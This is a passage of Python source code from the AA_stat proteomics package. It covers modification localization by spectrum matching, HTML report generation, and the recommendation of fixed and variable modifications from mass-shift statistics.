cterm_mod = aa_mass.pop('-OH', OH)
if modifications is None:
modifications = {}
for ind, pep in enumerate(peptide[:-1]):
for ion_type in ion_types:
nterminal = ion_type[0] in 'abc'
for charge in range(1, maxcharge + 1):
if ind == 0:
if nterminal:
mz = cmass.fast_mass2(
pep, ion_type=ion_type, charge=charge,
aa_mass=aa_mass, **kwargs) + (nterm_mod - H + modifications.get(1, 0.)) / charge
else:
mz = cmass.fast_mass2(''.join(peptide[1:]), ion_type=ion_type, charge=charge,
aa_mass=aa_mass, **kwargs) + (cterm_mod - OH) / charge + sum(
val for key, val in modifications.items() if key > 1) / charge
else:
if nterminal:
mz = peaks[ion_type, charge][-1] + (modifications.get(ind + 1, 0.) + aa_mass[pep]) / charge
else:
mz = peaks[ion_type, charge][-1] - (modifications.get(ind + 1, 0.) + aa_mass[pep]) / charge
peaks[ion_type, charge].append(mz)
theor_set[ion_type].append(int(mz / acc_frag))
theor_set = {k: set(v) for k, v in theor_set.items()}
# if modifications:
# utils.internal('aa_mass: %s', aa_mass)
# utils.internal('Theoretical spectrum with modifications: %s, %s, %s', peptide, modifications, peaks)
return peaks, theor_set
def RNHS_fast(spectrum_idict, theoretical_set, min_matched, ion_types=('b', 'y')):
"""
Matches experimental and theoretical spectra in int formats.
Parameters
----------
spectrum_idict : list
Experimental spectrum in integer format. Output of preprocess_spectrum.
theoretical_set: dict
A dict where key is ion type and value is a set of integers (m/z / fragment accuracy).
Output of get_theor_spec function.
min_matched : int
Minumum peaks to be matched.
ion_types : tuple
Fragment ion types. ('b', 'y')
Returns
-------
Number of matched peaks, score.
"""
matched = []
isum = 0
for ion_type in ion_types:
match = 0
for ion in theoretical_set[ion_type]:
if ion in spectrum_idict:
match += 1
isum += spectrum_idict[ion]
matched.append(match)
matched_approx = sum(matched)
if matched_approx >= min_matched:
return matched_approx, np.prod([np.math.factorial(m) for m in matched]) * isum
else:
return 0, 0
_preprocessing_cache = {}
def preprocess_spectrum(reader, spec_id, kwargs, acc=0.01):
"""
Prepares experimental spectrum for matching, converts experimental spectrum to int format.
Default settings for preprocessing : maximum peaks is 100, dynamic range is 1000.
Parameters
----------
reader : file reader
Spectrum file reader
spec_id : str
Spectrum id.
Returns
-------
List of experimental mass spectrum in integer format.
"""
spectrum = _preprocessing_cache.setdefault((reader, spec_id), {})
if spectrum:
# logger.debug('Returning cached spectrum %s', spec_id)
return spectrum
# logger.debug('Preprocessing new spectrum %s', spec_id)
original = reader[spec_id]
maxpeaks = kwargs.get('maxpeaks', 100)
dynrange = kwargs.get('dynrange', 1000)
mz_array = original['m/z array']
int_array = original['intensity array']
int_array = int_array.astype(np.float32)
if dynrange:
i = int_array > int_array.max() / dynrange
int_array = int_array[i]
mz_array = mz_array[i]
if maxpeaks and int_array.size > maxpeaks:
i = np.argsort(int_array)[-maxpeaks:]
j = np.argsort(mz_array[i])
int_array = int_array[i][j]
mz_array = mz_array[i][j]
tmp = (mz_array / acc).astype(int)
for idx, mt in enumerate(tmp):
i = int_array[idx]
spectrum[mt] = max(spectrum.get(mt, 0), i)
spectrum[mt - 1] = max(spectrum.get(mt - 1, 0), i)
spectrum[mt + 1] = max(spectrum.get(mt + 1, 0), i)
return spectrum
def peptide_isoforms(peptide, m, sites, prev_aa, next_aa):
"""
Parameters
----------
peptide : list
Peptide sequence
m: modification label to apply
sites : set
Amino acids eligible for modification
Returns
-------
set of lists
"""
isoforms = []
if ('N-term' in sites or 'Protein N-term' in sites and prev_aa == '-') and len(peptide[0]) == 1 and peptide[0] not in sites:
isoforms.append((m + peptide[0],) + tuple(peptide[1:]))
if ('C-term' in sites or 'Protein C-term' in sites and next_aa == '-') and len(peptide[-1]) == 1 and peptide[-1] not in sites:
isoforms.append(tuple(peptide[:-1]) + (m + peptide[-1],))
for ind, a in enumerate(peptide):
if a in sites:
isoforms.append(tuple(peptide[:ind]) + (m + a,) + tuple(peptide[ind + 1:]))
return isoforms
def get_candidates_from_aastat(mass_shifts_table, labels, threshold=1.5):
"""
Get localization candidates from amono acid statistics.
Parameters
----------
mass_shifts_table : DataFrame
DF with amino acid statistics for all mass shifts.
labels : list
List of amino acids that should be considered.
threshold : float
Threshold to be considered as significantly changed.
Results
-------
Series with mass shift as index and list of candidates as value.
"""
df = mass_shifts_table.loc[:, labels]
ms, aa = np.where(df > threshold)
out = {ms: [] for ms in mass_shifts_table.index}
for i, j in zip(ms, aa):
out[df.index[i]].append(df.columns[j])
return pd.Series(out)
def get_full_set_of_candidates(locmod_df):
"""
Build list of dicts from all_candidates column taking into account the sums of modification.
Parameters
----------
locmod_df : DataFrame
DF with candidates for mass shifts.
Returns
-------
Series
"""
out = defaultdict(list)
for ind in locmod_df.index:
out[ind].append({ind: locmod_df.at[ind, 'all candidates']})
if isinstance(locmod_df.at[ind, 'sum of mass shifts'], list):
for pair in locmod_df.at[ind, 'sum of mass shifts']:
tmp_dict = {}
tmp_dict[pair[0]] = locmod_df.at[pair[0], 'all candidates']
if len(pair) > 1:
tmp_dict[pair[1]] = locmod_df.at[pair[1], 'all candidates']
out[ind].append(tmp_dict)
return pd.Series(out)
def localization_of_modification(ms, ms_label, row, loc_candidates, params_dict, spectra_dict, mass_shift_dict):
"""
Localizes modification for mass shift in a peptide.
If two peptides isoforms have the same score, modification counts as 'non-localized'.
Parameters
----------
ms: float
mass shift
ms_label : str
Label for considered mass shift.
row : DataFrame row
Data Frame row for filtered PSMs data.
loc_candidates : list
List of dicts with candidates for localization. locmod_df['loc candidates']
params_dict : dict
Dict with all parameters.
spectra_dict : dict
Keys are filenames and values are Pyteomics readers.
sum_mod : bool
True if sum of codifications should be considered.
Returns
-------
Counter of localizations, top isoform, score difference
"""
mass_dict_0 = mass.std_aa_mass.copy()
mass_dict_0.update(params_dict['fix_mod'])
peptide = params_dict['peptides_column']
prev_aa = params_dict['prev_aa_column']
next_aa = params_dict['next_aa_column']
charge = row[params_dict['charge_column']]
modif_labels = string.ascii_lowercase
mod_dict = utils.get_var_mods(row, params_dict)
loc_stat_dict = Counter()
if params_dict['mzml_files']:
scan = row[params_dict['spectrum_column']].split('.')[1].lstrip('0')
spectrum_id = 'controllerType=0 controllerNumber=1 scan=' + scan
else:
spectrum_id = row[params_dict['spectrum_column']]
exp_dict = preprocess_spectrum(spectra_dict[row['file']], spectrum_id, {}, acc=params_dict['frag_acc'],)
top_score, second_score = 0, 0
top_isoform = None
top_terms = None
for terms in loc_candidates:
scores = []
mass_dict = mass_dict_0.copy()
isoform_part = []
new_isoform_part = []
i = 0
isoforms = []
sequences = []
for _ms in terms:
mod_aa = {modif_labels[i] + aa: mass_shift_dict[_ms] + mass_dict[aa] for aa in params_dict['labels']}
mass_dict.update(mod_aa)
mass_dict[modif_labels[i]] = mass_shift_dict[_ms]
if not isoform_part: # first modification within this shift (or whole shift)
isoform_part += peptide_isoforms(list(row[peptide]), modif_labels[i], terms[_ms], row[prev_aa], row[next_aa])
if _ms == ms_label:
# this is the whole-shift modification
isoforms += isoform_part
elif len(terms) == 1:
# two equal mass shifts form this mass shift. Apply the second half
for p in isoform_part:
new_isoform_part += peptide_isoforms(p, modif_labels[i], terms[_ms], row[prev_aa], row[next_aa])
else:
# second mass shift
for p in isoform_part:
new_isoform_part += peptide_isoforms(p, modif_labels[i], terms[_ms], row[prev_aa], row[next_aa])
i += 1
isoforms += new_isoform_part
sequences = [list(x) for x in isoforms]
# utils.internal('Generated %d isoforms for terms %s at shift %s', len(sequences), terms.keys(), ms_label)
for seq in sequences:
# utils.internal('seq = %s', seq)
theor_spec = get_theor_spectrum(seq,
params_dict['frag_acc'], maxcharge=charge, aa_mass=mass_dict, ion_types=params_dict['ion_types'], modifications=mod_dict)
scores.append(RNHS_fast(exp_dict, theor_spec[1], params_dict['min_spec_matched'], ion_types=params_dict['ion_types'])[1])
scores = np.array(scores)
i = np.argsort(scores)[::-1]
scores = scores[i]
sequences = np.array(sequences)[i]
if scores.size:
if scores[0] > top_score:
second_score = top_score
top_score = scores[0]
top_isoform = sequences[0]
top_terms = terms
if scores.size > 1 and scores[1] > second_score:
second_score = scores[1]
if top_isoform is None:
return loc_stat_dict, None, None, None, None
if any(all(sites <= {'C-term', 'N-term'} for sites in terms.values())
for terms in loc_candidates):
# utils.internal('Injecting unmodified spectra for %s', ms)
unmod_spec = get_theor_spectrum(list(row[peptide]), params_dict['frag_acc'], maxcharge=charge,
aa_mass=mass_dict_0, ion_types=params_dict['ion_types'], modifications=mod_dict)
unmod_score = RNHS_fast(exp_dict, unmod_spec[1], params_dict['min_spec_matched'], ion_types=params_dict['ion_types'])[1]
else:
unmod_score = 0
if top_score == second_score or top_score <= unmod_score:
utils.internal('top score = %f, second score = %f, unmod score = %f', top_score, second_score, unmod_score)
loc_stat_dict['non-localized'] += 1
return loc_stat_dict, None, None, None, None
mass_dict = mass_dict_0.copy()
# utils.internal('Top isoform is %s for terms %s (shift %s)', top_isoform, top_terms, ms_label)
i = 0
for _ms in top_terms:
mod_aa = {modif_labels[i] + aa: mass_shift_dict[_ms] + mass_dict[aa] for aa in params_dict['labels']}
mass_dict.update(mod_aa)
mass_dict[modif_labels[i]] = mass_shift_dict[_ms]
i += 1
for ind, a in enumerate(top_isoform):
if len(a) > 1:
if ind == 0:
loc_stat_dict[utils.format_localization_key('N-term', mass_dict[a[0]])] += 1
elif ind == len(top_isoform) - 1:
loc_stat_dict[utils.format_localization_key('C-term', mass_dict[a[0]])] += 1
loc_stat_dict[utils.format_localization_key(a[1], mass_dict[a[0]])] += 1
scorediff = (top_score - second_score) / top_score
top_i = ''.join(top_isoform)
ret = loc_stat_dict, top_i, top_terms, scorediff, utils.loc_positions(top_isoform)
utils.internal('Returning: %s', ret)
return ret
def localization(df, ms, ms_label, locations_ms, params_dict, spectra_dict, mass_shift_dict):
"""
Localizes modification or sum of modifications for mass shift and repeat localization if there are redundant candidates.
If two peptide isoforms have the same max score, modification counts as 'non-localized'.
Parameters
----------
df : DataFrame
DF with filtered peptides for considered mass shift.
ms: float
mass shift
ms_label : str
Considered mass shift label
locations_ms :
locmod_df['loc candidates']
params_dict : dict
Dict with all paramenters.
spectra_dict : dict
Keys are filenames and values are Pyteomics readers.
Returns
-------
Counter of localizations.
"""
logger.info('Localizing %s...', ms_label)
logger.debug('Localizations: %s', locations_ms)
if len(locations_ms) < 2 and list(locations_ms[0].values())[0] == set():
df['localization_count'], df['top isoform'], df['top_terms'], df['localization score'], df['loc_position'] = None, None, None, None, None
else:
z = list(zip(*df.apply(lambda x: localization_of_modification(
ms, ms_label, x, locations_ms, params_dict, spectra_dict, mass_shift_dict), axis=1)))
utils.internal('z: %s', z)
names = ['localization_count', 'top isoform', 'top_terms', 'localization score', 'loc_position']
dt = {'localization score': np.float32}
for c, v in zip(names, z):
t = dt.get(c, np.object_)
# utils.internal('Saving %s as %s...', c, t)
shape = (len(v), )
value = np.empty(shape, t)
value[:] = v
# utils.internal('Value: %s', value)
df[c] = value
fname = io.table_path(params_dict['output directory'], ms_label)
peptide = params_dict['peptides_column']
mod_aa = string.ascii_lowercase
mod_dicts = {}
for pair in locations_ms:
labels_mod = {}
i = 0
for m in pair:
labels_mod[mod_aa[i]] = m
i += 1
mod_dicts[tuple(sorted(pair))] = labels_mod
columns = ['top isoform', 'localization score', params_dict['spectrum_column']]
df['top isoform'] = df['top isoform'].fillna(df[peptide])
df.loc[df.top_terms.notna(), 'mod_dict'] = df.loc[df.top_terms.notna(), 'top_terms'].apply(lambda t: mod_dicts[tuple(sorted(t))])
df['top isoform'] = df.apply(utils.format_isoform, axis=1, args=(params_dict,))
df[columns].to_csv(fname, index=False, sep='\t')
result = df['localization_count'].sum() or Counter()
logger.debug('Localization result for %s: %s', ms_label, result)
return {ms_label: result} | AA-stat | /AA_stat-2.5.5-py3-none-any.whl/AA_stat/localization.py | localization.py |
import jinja2
import logging
import os
import sys
import re
import warnings
import json
import pkg_resources
from datetime import datetime
import math
import operator
import pandas as pd
import lxml.html
from pyteomics import mass
from . import utils, stats
logger = logging.getLogger(__name__)
def format_unimod_repr(record):
return '<a href="http://www.unimod.org/modifications_view.php?editid1={0[record_id]}">{0[title]}</a>'.format(record)
def matches(row, ms, sites, params_dict):
ldict = row['localization_count']
if 'non-localized' in ldict:
return False
for loc in ldict:
site, shift = utils.parse_l10n_site(loc)
if shift != ms:
continue
for possible_site, possible_position in sites:
if site == possible_site:
if possible_position[:3] == 'Any': # Anywhere, Any C-term, Any N-term
return True
if possible_position == 'Protein N-term' and row[params_dict['prev_aa_column']] == '-':
return True
if possible_position == 'Protein C-term' and row[params_dict['next_aa_column']] == '-':
return True
return False
def format_unimod_info(row, df, params_dict):
out = []
for record_id in row['unimod accessions']:
record = utils.UNIMOD[record_id]
name = format_unimod_repr(record)
if 'top isoform' in df:
sites = {(group['site'], group['position']) for group in record['specificity']}
matching = df.apply(matches, args=(row.name, sites, params_dict), axis=1).sum()
total = row['# peptides in bin']
out.append({'label': '{} ({:.0%} match)'.format(name, matching / total),
'priority': 1 - matching / total, 'type': 'unimod', 'ref': []})
else:
out.append({'label': name, 'priority': 1, 'type': 'unimod', 'ref': []})
return out
def get_label(table, ms, second=False):
row = table.loc[ms]
if len(row['raw info']) == 1:
if len(row['unimod accessions']) == 1:
record = utils.UNIMOD[next(iter(row['unimod accessions']))]
return ('+ ' if second else '') + format_unimod_repr(record)
return ms
def get_artefact_interpretations(row, mass_shift_data_dict, locmod_df, params_dict):
out = []
aa_mass = mass.std_aa_mass.copy()
aa_mass.update(params_dict['fix_mod'])
enz = params_dict.get('enzyme')
df = mass_shift_data_dict[row.name][1]
peps = df[params_dict['peptides_column']]
match_aa = set()
for aa, m in aa_mass.items():
if abs(abs(row['mass shift']) - m) < params_dict['frag_acc']:
match_aa.add(aa)
if not match_aa:
return []
if enz:
cut = set(enz['cut']) & match_aa
nocut = set(enz.get('nocut', []))
else:
cut, nocut = None, set()
explained = False
if row['mass shift'] < 0:
# this can be a loss of any terminal amino acid, or ...
# an artefact of open search, where the peptide is actually unmodified.
# in the latter case the amino acid should be an enzyme cleavage site
if cut:
# possible artefact
if enz['sense'] == 'C':
pct = (
(peps.str[0].isin(cut) & ~peps.str[1].isin(nocut)) | # extra amino acid at N-term
peps.str[-2].isin(cut) # extra amino acid at C-term
).sum() / df.shape[0]
elif enz['sense'] == 'N':
pct = (
peps.str[1].isin(cut) |
(peps.str[-1].isin(cut) & ~peps.str[-2].isin(nocut))
).sum() / df.shape[0]
else:
logger.critical('Unknown value of sense in specificity: %s', enz)
sys.exit(1)
logger.debug('%.1f%% of peptides in %s %s with %s.',
pct * 100, row.name, ('start', 'end')[enz['sense'] == 'N'], utils.format_list(cut))
if pct > params_dict['artefact_thresh']:
out.append('Search artefact: unmodified peptides with extra {} at {}-terminus ({:.0%} match)'.format(
utils.format_list(cut), 'CN'[enz['sense'] == 'C'], pct))
explained = True
else:
logger.debug('Not enough peptide support search artefact interpretation.')
if not explained:
if 'top isoform' in df:
lcount = locmod_df.at[row.name, 'localization']
pct = (
lcount.get(utils.format_localization_key('N-term', row.name), 0) +
lcount.get(utils.format_localization_key('C-term', row.name), 0)
) / df.shape[0]
logger.debug('%.1f%% of peptides in %s have terminal localization.', pct * 100, row.name)
if pct > params_dict['artefact_thresh']:
out.append('Loss of ' + utils.format_list(match_aa))
if not enz:
out[-1] += ' or an open search artefact'
else:
# this may be a missed cleavage
if cut:
keys = [params_dict['prev_aa_column'], params_dict['next_aa_column']]
pct = df[keys].apply(
lambda row: bool(cut.intersection(row[keys[0]] + row[keys[1]])), axis=1).sum() / df.shape[0]
logger.debug('%.1f%% of peptides in %s have %s as neighbor amino acid.',
pct * 100, row.name, utils.format_list(cut))
if pct > params_dict['artefact_thresh']:
out.append('Possible miscleavage (extra {} at terminus)'.format(utils.format_list(cut)))
else:
logger.debug('Not enough peptide support search artefact interpretation.')
return out
def collect_info(row, table, mass_shift_data_dict, locmod_df, params_dict):
# Each interpretation is a dict with keys: label, priority, type, ref
options = [{'label': x, 'priority': 0, 'type': 'artefact', 'ref': []} for x in get_artefact_interpretations(
row, mass_shift_data_dict, locmod_df, params_dict)]
options.extend(format_unimod_info(row, mass_shift_data_dict[row.name][1], params_dict))
if row['isotope index']:
options.append({'label': 'isotope of {}', 'ref': [row['isotope index']],
'priority': abs(math.log10(table.at[row['isotope index'], '# peptides in bin'] /
row['# peptides in bin'] / 8)), 'type': 'isotope'})
if isinstance(row['sum of mass shifts'], list):
for terms in row['sum of mass shifts']:
options.append({'label': '{} {}', 'ref': list(terms), 'type': 'sum',
'priority': 1 - min(table.at[terms[0], '# peptides in bin'],
table.at[terms[1], '# peptides in bin']) / table['# peptides in bin'].max()})
logger.debug('Raw options for row %s: %s', row.name, options)
return options
def html_info_item(info):
return '<span class="info_item {0[type]}" data-ref="{0[ref]}">{0[label]}</span>'.format(info)
def format_info(row, table, char_limit):
s = row['raw info']
for d in s:
if d['type'] == 'isotope':
d['label'] = d['label'].format(get_label(table, d['ref'][0]))
if d['type'] == 'sum':
d['label'] = d['label'].format(get_label(table, d['ref'][0]), get_label(table, d['ref'][1], second=True))
out = []
total_len = 0
for info in sorted(s, key=operator.itemgetter('priority')):
out.append(html_info_item(info))
cur_len = len(lxml.html.document_fromstring(info['label']).text_content())
total_len += cur_len
utils.internal('Label %s assigned length %d (total %d)', info['label'], cur_len, total_len)
if total_len > char_limit:
break
else:
return ', '.join(out)
return ', '.join(out[:1]) + '... <span class="expand_info">(<a class="expand_info_link">expand</a>)</span>'
def format_isoform(isoform):
out = re.sub(r'([A-Z]\[[+-]?[0-9]+\])', r'<span class="loc">\1</span>', isoform)
out = re.sub(r'([A-Z]?)\{([+-]?[0-9]+)\}', r'<span class="vmod_loc">\1[\2]</span>', out)
out = re.sub(r'^([A-Z])\.', r'<span class="nterm"><span class="prev_aa">\1</span>.</span>', out)
out = re.sub(r'\.([A-Z])$', r'<span class="cterm">.<span class="next_aa">\1</span></span>', out)
return out
def render_html_report(table_, mass_shift_data_dict, locmod_df, params_dict,
recommended_fmods, recommended_vmods, vmod_combinations, opposite, save_directory, ms_labels, step=None):
peptide = params_dict['peptides_column']
path = os.path.join(save_directory, 'report.html')
if os.path.islink(path):
logger.debug('Deleting link: %s.', path)
os.remove(path)
if table_ is None:
with open(path, 'w') as f:
f.write('No mass shifts found.')
return
table = table_.copy()
labels = params_dict['labels']
table['raw info'] = table.apply(collect_info, axis=1, args=(table, mass_shift_data_dict, locmod_df, params_dict))
table['Possible interpretations'] = table.apply(format_info, args=(table, params_dict['html_truncate']), axis=1)
full_info = json.dumps([', '.join(html_info_item(x)
for x in sorted(y, key=operator.itemgetter('priority'))) for y in table['raw info']])
artefact_i = json.dumps([i
for i, (aa, ms) in enumerate(recommended_vmods)
if aa != 'isotope error' and any(x['type'] == 'artefact' for x in table.at[ms, 'raw info'])
])
with pd.option_context('display.max_colwidth', 250):
columns = list(table.columns)
mslabel = '<a id="binh" href="#">mass shift</a>'
columns[0] = mslabel
table.columns = columns
to_hide = list({'is reference', 'sum of mass shifts', 'isotope index', 'unimod accessions',
'is isotope', 'unimod candidates', 'raw info'}.intersection(columns))
table_html = table.style.hide(axis='index').hide(to_hide, axis='columns').applymap(
lambda val: 'background-color: yellow' if val > 1.5 else '', subset=labels
).apply(
lambda row: ['background-color: #cccccc' if row['is reference'] else '' for cell in row], axis=1).set_table_styles([
{'selector': 'tr:hover', 'props': [('background-color', 'lightyellow')]},
{'selector': 'td, th', 'props': [('text-align', 'center')]},
{'selector': 'td, th', 'props': [('border', '1px solid black')]}]
).format({
mslabel: '<a href="#">{}</a>'.format(utils.MASS_FORMAT).format,
'# peptides in bin': '<a href="#">{}</a>'.format}, precision=3
).bar(subset='# peptides in bin', color=stats.cc[2]).to_html(
uuid="aa_stat_table")
peptide_tables = []
for ms in table.index:
df = mass_shift_data_dict[ms][1]
if 'localization score' in df and df['localization score'].notna().any():
df = df.sort_values(['localization score'], ascending=False).loc[:,
['top isoform', 'localization score', params_dict['spectrum_column']]]
df['localization score'] = df['localization score'].astype(float)
else:
dfc = df[[peptide, params_dict['spectrum_column'], params_dict['mods_column']]].copy()
dfc[peptide] = dfc.apply(utils.get_column_with_mods, axis=1, args=(params_dict,))
dfc[peptide] = (
df[params_dict['prev_aa_column']].str[0] + '.' + dfc[peptide] + '.' + df[params_dict['next_aa_column']].str[0])
df = dfc[[peptide, params_dict['spectrum_column']]]
peptide_tables.append(df.to_html(
table_id='peptides_' + ms, classes=('peptide_table',), index=False, escape=False, na_rep='',
formatters={
'top isoform': format_isoform,
peptide: format_isoform,
'localization score': '{:.2f}'.format}))
varmod_table_styles = [{'selector': 'th.col_heading', 'props': [('display', 'none')]},
{'selector': 'th.blank', 'props': [('display', 'none')]},
{'selector': '.data.row0', 'props': [('font-weight', 'bold')]}]
if params_dict['fix_mod']:
d = params_dict['fix_mod'].copy()
d = utils.masses_to_mods(d)
fixmod = pd.DataFrame.from_dict(d, orient='index', columns=['value']).T.style.set_caption(
'Configured, fixed').format(utils.MASS_FORMAT).to_html(uuid="set_fix_mod_table")
else:
fixmod = "Set modifications: none."
if params_dict['var_mod']:
varmod = pd.DataFrame.from_records(params_dict['var_mod'], columns=['', 'value']).T.style.set_caption(
'Configured, variable').format(
lambda x: utils.mass_format(x) if isinstance(x, float) else x).set_table_styles(
varmod_table_styles).to_html(uuid="set_var_mod_table")
else:
varmod = None
if recommended_fmods:
recmod = pd.DataFrame.from_dict(recommended_fmods, orient='index', columns=['value']).T.style.set_caption(
'Recommended, fixed').to_html(uuid="rec_fix_mod_table")
else:
recmod = "No fixed modifications recommended."
if recommended_vmods:
vmod_comb_i = json.dumps(list(vmod_combinations))
vmod_comb_val = json.dumps(['This modification is a combination of {} and {}.'.format(*v) for v in vmod_combinations.values()])
opp_mod_i = json.dumps(opposite)
opp_mod_v = json.dumps(['This modification negates a fixed modification.\n'
'For closed search, it is equivalent to set {} @ {} as variable.'.format(
utils.mass_format(-ms_labels[recommended_vmods[i][1]]), recommended_vmods[i][0]) for i in opposite])
rec_var_mods = pd.DataFrame.from_records(recommended_vmods, columns=['', 'value']).T.style.set_caption(
'Recommended, variable').format({'isotope error': '{:.0f}'}).set_table_styles(varmod_table_styles).to_html(uuid="rec_var_mod_table")
else:
rec_var_mods = "No variable modifications recommended."
vmod_comb_i = vmod_comb_val = opp_mod_i = opp_mod_v = '[]'
reference = table.loc[table['is reference']].index[0]
if step is None:
steps = ''
else:
if step != 1:
prev_url = os.path.join(os.path.pardir, 'os_step_{}'.format(step - 1), 'report.html')
prev_a = r'<a class="prev steplink" href="{}">Previous step</a>'.format(prev_url)
else:
prev_a = ''
if recommended_fmods:
next_url = os.path.join(os.path.pardir, 'os_step_{}'.format(step + 1), 'report.html')
next_a = r'<a class="next steplink" href="{}">Next step</a>'.format(next_url)
else:
next_a = ''
steps = prev_a + '\n' + next_a
version = pkg_resources.get_distribution('AA_stat').version
write_html(path, table_html=table_html, peptide_tables=peptide_tables, fixmod=fixmod, varmod=varmod,
reference=reference, recmod=recmod, rec_var_mod=rec_var_mods, steps=steps, version=version, date=datetime.now(),
vmod_comb_i=vmod_comb_i, vmod_comb_val=vmod_comb_val, opposite_i=opp_mod_i, opposite_v=opp_mod_v,
full_info=full_info, artefact_i=artefact_i)
def write_html(path, **template_vars):
with warnings.catch_warnings():
if not sys.warnoptions:
warnings.simplefilter('ignore')
templateloader = jinja2.PackageLoader('AA_stat', '')
templateenv = jinja2.Environment(loader=templateloader, autoescape=False)
template_file = 'report.template'
template = templateenv.get_template(template_file)
with open(path, 'w') as output:
output.write(template.render(template_vars)) | AA-stat | /AA_stat-2.5.5-py3-none-any.whl/AA_stat/html.py | html.py |
import logging
from collections import defaultdict
import re
from . import utils
logger = logging.getLogger(__name__)
def get_fix_mod_from_l10n(mslabel, locmod_df):
l10n = locmod_df.at[mslabel, 'localization']
logger.debug('Localizations for %s: %s', mslabel, l10n)
if l10n:
l10n.pop('non-localized', None)
top_loc = max(l10n, key=l10n.get)
logger.debug('Top localization label for %s: %s', mslabel, top_loc)
return top_loc
def get_fixed_mod_raw(aa, data_dict, params_dict, choices=None):
dist_aa = []
for ms, v in data_dict.items():
if choices is None or ms in choices:
dist_aa.append([v[0], v[1][params_dict['peptides_column']].apply(lambda x: x.count(aa)).sum()])
utils.internal('Counts for %s: %s', aa, dist_aa)
top_shift = max(dist_aa, key=lambda tup: tup[1])
return utils.mass_format(top_shift[0])
def determine_fixed_mods_nonzero(reference, locmod_df, data_dict):
"""Determine fixed modifications in case the reference shift is not at zero.
Needs localization.
"""
utils.internal('Localizations for %s: %s', reference, locmod_df.at[reference, 'localization'])
loc = get_fix_mod_from_l10n(reference, locmod_df)
label = reference
data_dict = data_dict.copy()
while loc is None:
del data_dict[label]
label = max(data_dict, key=lambda k: data_dict[k][1].shape[0])
loc = get_fix_mod_from_l10n(label, locmod_df)
logger.debug('No luck. Trying %s. Got %s', label, loc)
if not data_dict:
break
return loc
def determine_fixed_mods_zero(aastat_result, data_dict, params_dict):
"""Determine fixed modifications in case the reference shift is at zero.
Does not need localization.
"""
fix_mod_zero_thresh = params_dict['fix_mod_zero_thresh']
min_fix_mod_pep_count_factor = params_dict['min_fix_mod_pep_count_factor']
fix_mod_dict = {}
reference = utils.mass_format(0)
aa_rel = aastat_result[reference][2]
utils.internal('aa_rel:\n%s', aa_rel)
candidates = aa_rel[aa_rel < fix_mod_zero_thresh].index
logger.debug('Fixed mod candidates: %s', candidates)
for i in candidates:
candidate_label = get_fixed_mod_raw(i, data_dict, params_dict)
if candidate_label != reference:
# number of peptides with `i` at shift `candidate label` must be higher than ...
count_cand = data_dict[candidate_label][1][params_dict['peptides_column']].str.contains(i).sum()
# number of peptides with `i` at shift `reference` by a factor of `min_fix_mod_pep_count_factor`
count_ref = data_dict[reference][1][params_dict['peptides_column']].str.contains(i).sum()
# peptide count at candidate shift over # of peptides at reference
est_ratio = count_cand / len(data_dict[reference][1])
logger.debug('Peptides with %s: ~%d at %s, ~%d at %s. Estimated pct: %f',
i, count_ref, reference, count_cand, candidate_label, est_ratio)
if aastat_result[candidate_label][2][i] > fix_mod_zero_thresh and (
est_ratio * 100 > fix_mod_zero_thresh * min_fix_mod_pep_count_factor):
fix_mod_dict[i] = candidate_label
else:
logger.debug('Could not find %s anywhere. Can\'t fix.', i)
else:
logger.debug('Reference shift is the best for %s.', i)
return fix_mod_dict
def determine_fixed_mods(aastat_result, aastat_df, locmod_df, data_dict, params_dict):
reference = aastat_df.loc[aastat_df['is reference']].index[0]
if reference == utils.mass_format(0):
logger.info('Reference bin is at zero shift.')
fix_mod_dict = determine_fixed_mods_zero(aastat_result, data_dict, params_dict)
else:
if locmod_df is None:
logger.warning('No localization data. '
'Cannot determine fixed modifications when reference mass shift is non-zero.')
return {}
logger.info('Reference bin is at %s. Looking for fixed modification to compensate.', reference)
loc = determine_fixed_mods_nonzero(reference, locmod_df, data_dict)
if loc:
aa, shift = utils.parse_l10n_site(loc)
fix_mod_dict = {aa: shift}
else:
logger.info('No localizations. Stopping.')
return fix_mod_dict
def recommend_isotope_error(aastat_df, locmod_df, params_dict):
reference = aastat_df.loc[aastat_df['is reference']].index[0]
ref_peptides = locmod_df.at[reference, '# peptides in bin']
logger.debug('%d peptides at reference %s', ref_peptides, reference)
ref_isotopes = []
label = reference
while label:
label = utils.get_isotope_shift(label, locmod_df)
ref_isotopes.append(label)
ref_isotopes.pop()
i = 0
for i, label in enumerate(ref_isotopes, 1):
peps = locmod_df.at[label, '# peptides in bin']
logger.debug('%d peptides at %s.', peps, label)
if peps * 100 / ref_peptides < params_dict['recommend isotope threshold']:
return i - 1
return i
def recalculate_counts(aa, ms, mods_and_counts, data_dict):
mods_and_counts[aa].pop(ms, None)
for i, row in data_dict[ms][1].iterrows():
seq = row['top isoform'].split('.')[1]
if row['top_terms'] is not None and ms in row['top_terms']:
if aa == 'N-term' and seq[1] == '[':
utils.internal('Reducing count of %s for %s (%s)', seq[0], seq, aa)
if mods_and_counts[seq[0]].get(ms, 0) > 0:
mods_and_counts[seq[0]][ms] -= 1
elif aa == 'C-term' and seq[-1] == ']':
res = seq.split('[')[0][-1]
utils.internal('Reducing count of %s for %s (%s)', res, seq, aa)
if mods_and_counts[res].get(ms, 0) > 0:
mods_and_counts[res][ms] -= 1
elif seq[:2] == aa + '[':
utils.internal('Reducing count of N-term for %s', seq)
if mods_and_counts['N-term'].get(ms, 0) > 0:
mods_and_counts['N-term'][ms] -= 1
elif seq[-1] == ']' and seq.split('[')[0][-1] == aa:
utils.internal('Reducing count of C-term for %s', seq)
if mods_and_counts['C-term'].get(ms, 0) > 0:
mods_and_counts['C-term'][ms] -= 1
def recalculate_with_isotopes(aa, ms, isotope_rec, mods_and_counts, data_dict, locmod_df):
logger.debug('Recalculating counts for %s @ %s', aa, ms)
recalculate_counts(aa, ms, mods_and_counts, data_dict)
i = 0
while i < isotope_rec:
label = utils.get_isotope_shift(ms, locmod_df)
if label:
logger.debug('Recalculating %s counts for isotope shift %s', aa, label)
recalculate_counts(aa, label, mods_and_counts, data_dict)
i += 1
else:
break
def same_residue(isoform):
return ']{' in isoform or re.search(r'\.{[0-9+-]*?}[A-Z]\[', isoform)
def recalculate_varmods(data_dict, mods_and_counts, params_dict):
# cancel out already configured modifications
for site, mod in params_dict['var_mod']:
ms = utils.find_mass_shift(mod, data_dict, params_dict['prec_acc'])
if ms:
if mods_and_counts[site].get(ms, 0) > 0:
logger.debug('Setting all counts for %s @ %s to zero.', ms, site)
mods_and_counts[site][ms] = 0
for ms in data_dict:
shift, df = data_dict[ms]
for i, row in df.iterrows():
if row['top_terms'] is not None and ms in row['top_terms']:
peptide = row[params_dict['peptides_column']]
